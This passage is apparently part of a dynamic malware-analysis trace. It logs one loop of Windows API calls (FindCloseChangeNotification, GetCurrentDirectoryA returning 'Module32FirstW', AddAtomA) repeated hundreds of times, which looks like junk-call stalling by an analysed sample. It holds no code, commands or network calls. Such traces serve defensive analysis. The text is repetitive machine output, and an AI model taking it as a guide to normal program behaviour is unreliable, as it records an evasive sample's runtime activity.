FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.609] AddAtomA (lpString=0x0) returned 0x0 [0179.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.610] AddAtomA (lpString=0x0) returned 0x0 [0179.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.611] AddAtomA (lpString=0x0) returned 0x0 [0179.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.612] AddAtomA (lpString=0x0) returned 0x0 [0179.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.612] AddAtomA (lpString=0x0) returned 0x0 [0179.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.612] AddAtomA (lpString=0x0) returned 0x0 [0179.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.612] AddAtomA (lpString=0x0) returned 0x0 [0179.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.612] AddAtomA (lpString=0x0) returned 0x0 [0179.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.612] AddAtomA (lpString=0x0) returned 0x0 [0179.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.613] AddAtomA (lpString=0x0) returned 0x0 [0179.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.613] AddAtomA (lpString=0x0) returned 0x0 [0179.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.613] AddAtomA (lpString=0x0) returned 0x0 [0179.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.613] AddAtomA (lpString=0x0) returned 0x0 [0179.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.613] AddAtomA (lpString=0x0) returned 0x0 [0179.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.614] AddAtomA (lpString=0x0) returned 0x0 [0179.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.615] AddAtomA (lpString=0x0) returned 0x0 [0179.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.616] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.617] AddAtomA (lpString=0x0) returned 0x0 [0179.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.618] AddAtomA (lpString=0x0) returned 0x0 [0179.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.619] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.620] AddAtomA (lpString=0x0) returned 0x0 [0179.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.621] AddAtomA (lpString=0x0) returned 0x0 [0179.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.622] AddAtomA (lpString=0x0) returned 0x0 [0179.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 